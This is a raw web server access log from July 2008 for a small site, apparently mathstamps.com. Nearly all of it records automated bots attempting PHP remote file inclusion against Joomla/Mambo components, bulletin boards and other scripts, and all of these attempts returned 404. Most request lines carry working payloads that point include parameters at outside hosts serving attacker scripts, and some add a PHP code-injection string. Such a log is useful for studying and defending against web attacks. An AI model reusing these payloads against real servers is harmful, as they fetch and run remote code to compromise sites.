193.233.85.46 - - [27/Jul/2008:17:41:49 -0700] "GET /logs//ask_password.php?dir=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [27/Jul/2008:17:41:49 -0700] "GET //ask_password.php?dir=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [27/Jul/2008:17:41:57 -0700] "GET /logs/access_080609.log//ask_password.php?dir=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.31.206.138 - - [27/Jul/2008:17:42:27 -0700] "GET /logs/access_080602.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:17:42:32 -0700] "GET /logs/access_080512.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:17:42:34 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:17:42:36 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.243.169.10 - - [27/Jul/2008:17:43:31 -0700] "GET /logs/access_080616.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.243.169.10 - - [27/Jul/2008:17:43:31 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.243.169.10 - - [27/Jul/2008:17:43:32 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.67.21.95 - - [27/Jul/2008:17:44:03 -0700] "GET /logs/access_080630.log/errors.php?error=http://www.xn--plttlnd-6wad.de//wp-content/plugins/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.67.21.95 - - [27/Jul/2008:17:44:03 -0700] "GET /errors.php?error=http://www.xn--plttlnd-6wad.de//wp-content/plugins/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.67.21.95 - - [27/Jul/2008:17:44:04 -0700] "GET /logs/errors.php?error=http://www.xn--plttlnd-6wad.de//wp-content/plugins/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
72.243.169.10 - - [27/Jul/2008:17:45:06 -0700] "GET /logs/access_080512.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
201.218.236.2 - - [27/Jul/2008:17:47:45 -0700] "GET /logs/access_080428.log//ask_password.php?dir=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
201.218.236.2 - - [27/Jul/2008:17:47:45 -0700] "GET //ask_password.php?dir=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
201.218.236.2 - - [27/Jul/2008:17:47:45 -0700] "GET /logs//ask_password.php?dir=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
201.218.236.2 - - [27/Jul/2008:17:47:45 -0700] "GET /logs/access_080609.log//ask_password.php?dir=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
193.233.85.46 - - [27/Jul/2008:17:49:51 -0700] "GET /logs/access_080519.log%20//ask_password.php?dir=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [27/Jul/2008:17:49:56 -0700] "GET /logs/access_080519.log%20//ask_password.php?dir=http://www.radiomorada.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
201.218.236.2 - - [27/Jul/2008:17:50:36 -0700] "GET /logs/access_080519.log%20//ask_password.php?dir=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.93.82.97 - - [27/Jul/2008:17:50:53 -0700] "GET /logs/access_080602.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.93.82.97 - - [27/Jul/2008:17:50:53 -0700] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.93.82.97 - - [27/Jul/2008:17:50:53 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.93.82.97 - - [27/Jul/2008:17:53:50 -0700] "GET /logs/access_080414.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.93.82.97 - - [27/Jul/2008:17:53:51 -0700] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.93.82.97 - - [27/Jul/2008:17:53:51 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
204.15.10.22 - - [27/Jul/2008:17:54:52 -0700] "GET //payment/secpay/config.inc.php?config%5broot_dir%5d=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.mathstamps.com"
204.15.10.22 - - [27/Jul/2008:17:54:52 -0700] "GET /logs//payment/secpay/config.inc.php?config%5broot_dir%5d=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.mathstamps.com"
66.226.64.33 - - [27/Jul/2008:17:55:54 -0700] "GET //payment/secpay/config.inc.php?config%5broot_dir%5d=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.mathstamps.com"
66.226.64.33 - - [27/Jul/2008:17:55:54 -0700] "GET /logs//payment/secpay/config.inc.php?config%5broot_dir%5d=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:17:56:02 -0700] "GET /logs/access_080630.log//include/bbs.lib.inc.php?site_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:17:56:03 -0700] "GET //include/bbs.lib.inc.php?site_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:17:56:03 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.178.228.12 - - [27/Jul/2008:17:56:08 -0700] "GET //payment/secpay/config.inc.php?config%5broot_dir%5d=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.mathstamps.com"
193.178.228.12 - - [27/Jul/2008:17:56:08 -0700] "GET /logs//payment/secpay/config.inc.php?config%5broot_dir%5d=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.mathstamps.com"
80.93.82.97 - - [27/Jul/2008:17:56:19 -0700] "GET /logs/access_080602.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:17:56:23 -0700] "GET /logs/access_080630.log//include/bbs.lib.inc.php?site_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:17:56:24 -0700] "GET //include/bbs.lib.inc.php?site_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:17:56:24 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
80.93.82.97 - - [27/Jul/2008:17:56:35 -0700] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:17:57:15 -0700] "GET /logs/access_080505.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
66.226.64.33 - - [27/Jul/2008:18:00:13 -0700] "GET /logs/access_080331.log//payment/secpay/config.inc.php?config%5broot_dir%5d=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.226.64.33 - - [27/Jul/2008:18:00:13 -0700] "GET /logs/access_080331.log//payment/secpay/config.inc.php?config%5broot_dir%5d=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.226.64.33 - - [27/Jul/2008:18:00:13 -0700] "GET //payment/secpay/config.inc.php?config%5broot_dir%5d=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.226.64.33 - - [27/Jul/2008:18:00:13 -0700] "GET //payment/secpay/config.inc.php?config%5broot_dir%5d=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.226.64.33 - - [27/Jul/2008:18:00:13 -0700] "GET /logs//payment/secpay/config.inc.php?config%5broot_dir%5d=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.226.64.33 - - [27/Jul/2008:18:00:13 -0700] "GET /logs//payment/secpay/config.inc.php?config%5broot_dir%5d=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
204.15.10.22 - - [27/Jul/2008:18:00:21 -0700] "GET /logs/access_080331.log//payment/secpay/config.inc.php?config%5broot_dir%5d=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
204.15.10.22 - - [27/Jul/2008:18:00:21 -0700] "GET /logs/access_080331.log//payment/secpay/config.inc.php?config%5broot_dir%5d=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
204.15.10.22 - - [27/Jul/2008:18:00:21 -0700] "GET //payment/secpay/config.inc.php?config%5broot_dir%5d=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
204.15.10.22 - - [27/Jul/2008:18:00:21 -0700] "GET //payment/secpay/config.inc.php?config%5broot_dir%5d=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
204.15.10.22 - - [27/Jul/2008:18:00:21 -0700] "GET /logs//payment/secpay/config.inc.php?config%5broot_dir%5d=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
204.15.10.22 - - [27/Jul/2008:18:00:21 -0700] "GET /logs//payment/secpay/config.inc.php?config%5broot_dir%5d=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:18:02:17 -0700] "GET /logs/access_080526.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:18:02:19 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:18:02:22 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:18:04:39 -0700] "GET //include/bbs.lib.inc.php?site_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:18:04:52 -0700] "GET //include/bbs.lib.inc.php?site_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
80.67.19.69 - - [27/Jul/2008:18:09:07 -0700] "GET /logs/access_080616.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.rosomz.ru/v/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.67.19.69 - - [27/Jul/2008:18:09:07 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.rosomz.ru/v/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.67.19.69 - - [27/Jul/2008:18:09:08 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.rosomz.ru/v/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:18:14:07 -0700] "GET /logs/access_080623.log//include/bbs.lib.inc.php?site_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
80.93.82.97 - - [27/Jul/2008:18:14:18 -0700] "GET /logs/access_080623.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.93.82.97 - - [27/Jul/2008:18:14:18 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.93.82.97 - - [27/Jul/2008:18:14:19 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:18:14:37 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
80.93.82.97 - - [27/Jul/2008:18:14:46 -0700] "GET /logs/access_080602.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:18:14:50 -0700] "GET /logs/access_080623.log//include/bbs.lib.inc.php?site_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:18:16:15 -0700] "GET //include/write.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.6.22.104 - - [27/Jul/2008:18:16:23 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
80.67.19.69 - - [27/Jul/2008:18:16:35 -0700] "GET /logs/access_080602.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.rosomz.ru/v/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:18:18:47 -0700] "GET /logs/access_080630.log//include/write.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:18:18:47 -0700] "GET //include/write.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:18:18:48 -0700] "GET /logs//include/write.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:18:19:49 -0700] "GET /logs/access_080310.log//include/write.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:18:23:50 -0700] "GET /logs/access_080630.log/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:18:23:51 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:18:23:51 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:18:23:57 -0700] "GET /logs/access_080630.log/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:18:23:57 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:18:23:57 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:18:24:17 -0700] "GET /logs/access_080630.log//admin/spaw/spaw_control.class.php?spaw_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:18:24:17 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:18:24:20 -0700] "GET /logs/access_080630.log//admin/spaw/spaw_control.class.php?spaw_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:18:24:21 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.15.138.183 - - [27/Jul/2008:18:24:50 -0700] "GET /logs/access_080526.log//admin/spaw/spaw_control.class.php?spaw_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.10.128.148 - - [27/Jul/2008:18:24:59 -0700] "GET /logs/access_080526.log//admin/spaw/spaw_control.class.php?spaw_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
204.15.10.22 - - [27/Jul/2008:18:28:48 -0700] "GET ///index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.mathstamps.com"
204.15.10.22 - - [27/Jul/2008:18:28:48 -0700] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.mathstamps.com"
66.226.64.33 - - [27/Jul/2008:18:29:41 -0700] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.mathstamps.com"
66.226.64.33 - - [27/Jul/2008:18:29:41 -0700] "GET ///index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.mathstamps.com"
87.244.11.20 - - [27/Jul/2008:18:31:31 -0700] "GET /lostpasswd.php?env[include_prefix]=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.244.11.20 - - [27/Jul/2008:18:31:31 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.244.11.20 - - [27/Jul/2008:18:31:31 -0700] "GET /logs/access_080630.log/lostpasswd.php?env[include_prefix]=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:18:33:24 -0700] "GET /logs/access_080630.log//include/bbs.lib.inc.php?site_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:18:33:26 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
194.201.253.2 - - [27/Jul/2008:18:33:27 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
193.138.159.164 - - [27/Jul/2008:18:36:31 -0700] "GET //include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
193.138.159.164 - - [27/Jul/2008:18:36:31 -0700] "GET /logs//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
193.138.159.164 - - [27/Jul/2008:18:36:51 -0700] "GET /errors.php?error=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
193.138.159.164 - - [27/Jul/2008:18:36:51 -0700] "GET /logs/errors.php?error=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
87.244.11.20 - - [27/Jul/2008:18:40:26 -0700] "GET /logs/access_080526.log/lostpasswd.php?env[include_prefix]=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:18:41:26 -0700] "GET /logs/access_080526.log/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.210.115.114 - - [27/Jul/2008:18:42:26 -0700] "GET /logs/access_080526.log/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.154.157.108 - - [27/Jul/2008:18:43:25 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070801 Firefox/2.0 Wyzo/0.5.3" "www.mathstamps.com"
